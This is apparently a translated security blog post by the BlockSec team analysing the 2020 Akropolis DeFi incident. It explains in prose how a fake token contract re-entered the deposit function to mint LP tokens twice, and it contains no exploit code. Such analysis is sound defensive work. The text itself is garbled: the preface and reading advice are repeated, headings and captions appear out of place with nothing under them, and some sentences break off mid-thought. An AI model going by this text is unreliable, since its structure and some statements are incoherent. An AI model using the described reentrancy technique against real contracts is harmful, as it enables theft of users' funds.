Decentralized finance (DeFi), as a popular project form in the blockchain ecology, its security is particularly important. Since last year, dozens of security incidents have occurred.
As a long-term research team (https://blocksecteam.com) concerned with DeFi security, BlockSec has independently discovered a number of DeFi security incidents, and the research results have been published in top security conferences (including USENIX Security, CCS and Blackhat). In the next period of time, we will systematically analyze DeFi security incidents and analyze the root causes behind the security incidents
Past review:
(1) [One of BlockSec DeFi attack analysis series] I speak for myself: ChainSwap attack event analysis
(2) [BlockSec DeFi Attack Analysis Series 2] Give away everything: Sushiswap fees stolen
0xffffffff. Preface
As a long-term research team (https://blocksecteam.com) concerned with DeFi security, BlockSec has independently discovered a number of DeFi security incidents, and the research results have been published in top security conferences (including USENIX Security, CCS and Blackhat). In the next period of time, we will systematically analyze DeFi security incidents and analyze the root causes behind the security incidentshackerPast review:[One of BlockSec DeFi attack analysis series] I speak for myself: ChainSwap attack event analysis[BlockSec DeFi Attack Analysis Series 2] Give away everything: Sushiswap fees stolen
an attack deal
Reading suggestions:
If you are new to DeFi (Ethereum), you can read it from the beginning, but the article is relatively long, so if you can’t read it, remember to pay attention before leaving.
If you have a better understanding of DeFi aggregator projects such as Akropolis, you can start directly from "0x2 Attack Analysis".
0x0. Background introduction
Take this example as an in-depth interpretation of the principle of this attack.
Time: Nov-12-2020 12:04:02 PM +UTC #11242695
Reading suggestions:
If you are new to DeFi (Ethereum), you can read it from the beginning, but the article is relatively long, so if you can’t read it, remember to pay attention before leaving.
Protocol:
If you have a better understanding of DeFi aggregator projects such as Akropolis, you can start directly from "0x2 Attack Analysis".
Akropolis:
0x0. Background introduction
2020 can be described as the first year of decentralized finance (hereinafter referred to as DeFi). With the continuous development of the DeFi ecosystem, more and more DeFi projects are listed on Ethereum. Ordinary users can choose their favorite DeFi projects to invest in to obtain income. However, with the rapid expansion of the DeFi market, a problem faced by ordinary users is how to choose the target of investment among the many DeFi projects. They need someone to help them invest. In this case, a series of asset custody platforms and investment portfolio platforms have emerged as needed. Akropolis is one of many asset custody platforms:
Ordinary users invest their personal digital assets into Akropolis, and Akropolis determines the investment direction and optimizes the investment strategy. After Akropolis obtains investment income, it distributes the income proportionally to ordinary users who invest in Akropolis. Taking real-world financial activities as an example, Akropolis is like a fund. The DeFi projects it invests in are stocks. Fundamental citizens buy funds, and funds hold stocks, and distribute the proceeds to basic citizens after obtaining income.
Akropolis.deposit fucntion:
0x1. Akropolis mechanism
For ease of understanding, we first briefly introduce two physical contracts related to this attack: Protocol contract and Akropolis contract
Protocol can be simply understood as: users invest their tokens in the Protocol to obtain a share (share) of the Protocol, and when the assets in the Protocol appreciate in the future, the user can obtain a certain amount of income from the Protocol
As we said before, because there are too many DeFi projects on ETH, if users want to invest in multiple projects, they either don’t know how to choose, or the operation is relatively difficult, so Akropolis plays the role of an investment aggregator: Akropolis binds multiple A DeFi investment project, users can easily use the tokens in their hands to invest through Akropolis: users only need to simply call the Akropolis function, specify the protocol they want to invest in, and Akropolis will help you complete it in different protocols invest.
The overall interaction logic is shown in the figure:
Akropolis provides two external interfaces: function deposit(address_protocol, address[] memory_tokens, uint256[] memory_dnAmounts) and function withdraw(address_protocol, address token, uint256 dnAmount, uint256 maxNAmount)
The function of the deposit function is:
The user calls deposit.
Akropolis first calculates how many tokens are in the Protocol: nBalanceBefore.
Akropolis transfers the user's token into the Protocol.
Akropolis then calculates the number of tokens in the protocol: nBalanceAfter.
Get the amount of user investment: nDeposit = nBalanceAfter - nBalanceBefore.
withdraw fucntion:
The user's investment share is calculated by the amount of user's investment.
Akropolis.depositToProtocol function:
Akropolis.distributeYieldInternal function and Akropolis.updateProtocolBalance function:
STEP 1:
Protocol.normalizedBalance function:
STEP 2:
Note that _registeredTokens = [DAI, USDC, USDT, TUSD] in Protocol.normalizedBalance. The functions of the distributeYieldInternal function and updateprotocolBalance function used in the deposit function are to query the balance of all tokens (actually DAI, USDC, USDT, TUSD) in the current Protocol function. Note that normalizedBalance here means to normalize the balance Processing (because the decimals of different types of tokens are inconsistent).
STEP 3:
Users can call the deposit function to deposit a certain amount of tokens into Akropolis by specifying the Protocol, token and token amount, and Akropolis will return Akropolis LP Token to the user according to the amount of tokens deposited by the user. Then use the token invested by the user to invest in the Protocol.
By calling the withdraw function, the user withdraws the token deposited through the deposit function to obtain interest.
Others
0x2. Attack principle
We noticed that in the Akropolis.deposit function, it is necessary to calculate the beforeBalance first, then call the transferFrom function of the token, transfer the token to the Protocol, and finally calculate the afterbalance. This calculation method is correct under normal logic, but if the attacker provides The token address is a malicious address (that is, a fake token contract, Akropolis has not verified the token address), then in this case, the actual valid token has not been transferred to the Protocol account, and Akropolis. entry mechanism. This allows attackers to attack Akropolis by using 1. the token address has not been verified, and 2. the deposit function does not have a reentry mechanism. The attack flow chart is as follows:
The attacker first calls the Akropolis.deposit function, and the passed token address parameter is a malicious contract address. Inside the function, balanceBefore1 is first calculated, and then because the token contract address passed in by the attacker is a fake token forged by the attacker, Akropolis then calls the fakeToken.transferFrom function.
In the fakeToken.transferFrom function, the contract calls Akropolis.deposit again, and the passed token address is the real DAI address, so the logic of calling deposit for the second time is a normal logic: the attacker deposits a sum of DAI, and then Akropolis According to balanceAfter2-balanceBefore2, the corresponding LP token is issued for the attacker mint. Note: here balanceBefore2 = balanceBefore1.
Although the attacker only sent a sum of DAI of about $25k to Protocol in the entire transaction, due to the reentry mechanism, balanceBefore1 was not updated in time after the second deposit, making Akropolis return to the first time in the function control flow. In the deposit function, it was thought that the attacker transferred $25k of DAI to the Protocol. Thus mint out the corresponding LP tokens to the user again.
Driven by core security technology, the BlockSec team has long been concerned with DeFi security, digital currency anti-money laundering and digital asset custody based on privacy computing, providing contract security and digital asset security services for DApp project parties. The team has published more than 20 top security academic papers (CCS, USENIX Security, S&P), and its partners have won the title of AMiner's most influential security and privacy scholar in the world (ranked sixth in the world in 2011-2020). The research results have been awarded by CCTV, Xinhua News agency and overseas media reports. Independently discovered dozens of DeFi security vulnerabilities and threats, and won the first place in the world in the 2019 National Institutes of Health Privacy Computing Competition (SGX Track). Driven by technology, the team adheres to the concept of openness and win-win, and works with community partners to build a safe DeFi ecosystem.
https://www.blocksecteam.com/
contact@blocksecteam.com
